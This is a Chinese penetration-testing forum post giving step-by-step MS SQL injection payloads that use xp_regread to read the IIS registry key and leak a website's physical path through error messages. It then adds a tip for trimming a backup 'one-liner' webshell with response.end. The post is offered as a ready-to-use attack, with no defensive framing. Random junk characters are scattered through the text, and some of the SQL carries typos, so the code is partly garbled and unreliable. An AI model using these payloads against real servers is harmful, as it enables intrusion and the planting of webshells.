中国网络渗透测试联盟

标题: DB权限暴出网站物理路径代码 [打印本页]
作者: admin    时间: 2012-9-15 14:23
标题: DB权限暴出网站物理路径代码
1、drop table [jm_tmp];create table [jm_tmp](value navrchar(4000) null,data nvarchar(4000) null)-- 创建表/ S$ n6 K9 h& D5 M9 n

" ]! e1 G0 h# `1 y1 q& m* m* Z2 o! j- `( R% ^
  2、 delete [jm_tmp];insert [jm_tmp] exec master.dbo.xp_regread ’HKEY_LOCAL_MACHINE’,’SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots’,’/’-- 将网站目录插到表字段中2 }# m1 Q3 ?- w
) ]6 Q4 d$ |9 Y* G' ~% `

$ w) o/ E  X( Y- [: I6 W  3、and (select top 1 cast([data] as nvarchar(4000) char(124) from [jm_tmp] order by [data] desc)=0 ’//暴出字段
9 @/ I' P# `5 n, e- z! d2 M5 O9 {* X: }% j; c/ \3 q
7 e# h& X. C, \# f, o# t
  4、drop table [jm_tmp]-- 删除此表。
; N, \. z! o, d4 K% j) y1 A% m$ U; x

# E6 u7 j$ f3 |7 P3 f5 ?另附上备分专用一句话/ N1 W0 O* Q8 K6 L7 I4 z5 L
  加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.
' S" {, F4 }& M# j- E



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2